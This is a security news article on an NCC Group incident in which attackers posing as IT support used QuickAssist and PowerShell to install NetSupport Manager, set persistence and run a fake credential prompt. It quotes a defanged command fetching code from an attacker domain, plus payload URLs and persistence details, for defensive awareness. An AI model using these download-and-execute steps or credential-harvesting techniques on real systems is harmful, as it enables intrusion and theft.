Hackers Use Social Engineering to Gain Remote Access in Under 5 Minutes

NCC Group’s Digital Forensics and Incident Response (DFIR) team has documented a sophisticated social engineering attack that demonstrates how quickly threat actors can compromise corporate systems, achieving full remote access and establishing persistence mechanisms in less than 300 seconds.

The incident involved impersonation of IT support personnel targeting approximately twenty users, with two victims ultimately granting remote access through Windows’ native QuickAssist remote support tool, leading to rapid deployment of offensive tooling and malware execution.

Lightning-Fast PowerShell Execution Chain

The attack sequence began when threat actors convinced users to allow remote access via QuickAssist, immediately launching a series of PowerShell commands that orchestrated the complete system compromise.

The initial payloaload executed (curl hxxps://resutato[.]com/2-4.txt).Content | Set-Clipboard to copy malicious commands to the clipboard, followed by a complex script that downloaded and executed additional PowerShell code from hxxps://resutato[.]com/b2/tap.php?tap=.

The core malicious payload employed sophisticated steganographic techniques, embedding encrypted data within a seemingly innocent JPEG file downloaded from hxxps://resutato[.]com/b2/res/nh2.jpg.

The script utilized a four-byte marker (0x31, 0x67, 0xBE, 0xE1) to locate the encrypted payload within the image file, then performed XOR decryption using derived key material to extract a ZIP archive containing NetSupport Manager remote access tools.

The extracted files were deployed to C:Users{username}AppDataRoamingNetHealth, with the directory marked as hidden to avoid detection.

Multi-Layer Persistence and Credential Harvesting

Following successful payload deployment, the threat actors established multiple persistence mechanisms to ensure continued access to compromised systems.

They created registry entries at HKCUSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUNNETHEALTH to automatically execute NetHealth.exe Upon user login, while simultaneously deploying a scheduled task named EventLogBackupTask configured to run every five minutes.

The attack culminated with the deployment of a sophisticated credential harvesting script that created a fake authentication dialog using Windows Presentation Framework (WPF) and XAML markup.

This GUI-based phishing component prompted users to re-enter their credentials under the guise of “System Credential Verification,” writing captured credentials to C:Users{username}AppDataLocalTempcred.txt.

The malicious script even included functionality to hide the Windows taskbar during credential capture, creating a more convincing full-screen authentication experience.

This incident underscores the critical importance of user awareness training and robust incident response capabilities, as the entire attack chain from initial compromise to full system control occurred within 167 seconds, demonstrating how rapidly modern cyber threats can escalate from simple social engineering to complete organizational compromise.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates

The post Hackers Use Social Engineering to Gain Remote Access in Under 5 Minutes appeared first on Cyber Security News.